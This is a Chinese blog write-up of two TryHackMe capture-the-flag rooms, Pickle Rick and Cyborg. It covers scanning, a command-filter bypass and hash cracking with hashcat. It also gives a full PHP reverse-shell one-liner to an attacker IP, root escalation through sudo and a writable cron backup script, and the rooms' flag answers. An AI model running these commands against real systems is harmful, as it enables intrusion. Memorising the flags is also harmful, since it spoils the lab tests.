Pr1nt
文章12
标签8
分类4

文章分类

文章归档

THM 两个简单靶场记录

THM 两个简单靶场记录

记录下try hack me的学习之路

Pickle Rick

题目

需要寻找三部分flag


flag1

首先打开题目,什么也没有,按F12看到用户名
1

然后信息收集:

  1. nmap扫描发现只开了两个端口:22,80
  2. dirsearch扫描发现可疑文件
    2

访问robots.txt 看到一串字符串: Wubbalubbadubdub,猜测是密码
访问login.php 使用用户名和密码登录
3

是一个命令执行窗口,输入ls看看
4

cat一下第一个txt文件发现被过滤,使用经典的绕过:tac
5
6
得到第一个flag:mr. meeseek hair

flag2

接着tac其他文件发现并无关键信息
clue.txt 内容:Look around the file system for the other ingredient.
defined.php为:7
显然,权限不够于是思考反弹shell到攻击机,使用php语言php -r '$sock=fsockopen("10.8.39.215",9999);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
shell
反弹成功,并发现可以直接使用sudo su 变成root权限
然后就是随心所欲了,cd /home发现rick,进一步拿到第二个flag: 1 jerry tear
shell2

flag3

根据直接提权到root猜测最后一个flag在root目录下(让我们一开始不是root的时候访问不了)
shell3
拿到最后一个flag:fleeb juice

总结:这个还是很好玩的,体会到一步步寻找的乐趣,而且也非常简单,适合初学者熟悉大致流程。

Cyborg

信息收集

先用nmap扫描开放端口信息,枚举端口上运行的服务

访问80端口是个apache默认页面,用dirb扫描一下网站目录

发现两个比较可疑的目录/admin和/etc

再用dirbuster扫一遍目录,得到一个压缩包archive.tar,我以为是源码之类的,打开发现不是。

现招其它线索,admin.html里有些聊天记录,这里有几个民资Josh、adam、alex

还有一个被描述的很重要的东西叫music_archive

暴力破解

随后在/etc目录下发现了这个东西,看起来像是一串密文,特征还比较明显

打开hashcat的密文类型进行匹配,匹配到1600 $apr1$

https://hashcat.net/wiki/doku.php?id=example_hashes

用hashcat暴力破解

暴力匹配rockyou得到明文,用这个密码ssh试了所有得到的类似用户的账号都没有进去。

再回到之前的tar文件,里面有个README,里面指向一个域名

访问一下,理解大概是一个文件储存仓库的东西

再github上也找到了相关的项目,这里有个安装包,我们下载来看看

运行borg就会出现帮助文档

flag1

根据文档用list 查看目录下的文件,密码用刚刚破解得到的hash,有个music_archive

用extract提取出来,密码一样。得到一个alex的文件

看下alex的目录结构类似于“home”目录

翻了目录得到alex的账号和密码

ssh上去直接拿到第一个flag

flag1

flag2

使用sudo -l查看具有sudo权限的命令,有个/etc/mp3backups/backup.sh

查看文件所有者是alex,加个可写权限

在文件中加入反弹shell命令

shell

攻击机上起监听,没一会shell 就过来了

登录后crontab -l看下定时任务,

发现backup.sh在定时任务中

成功拿到root

flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}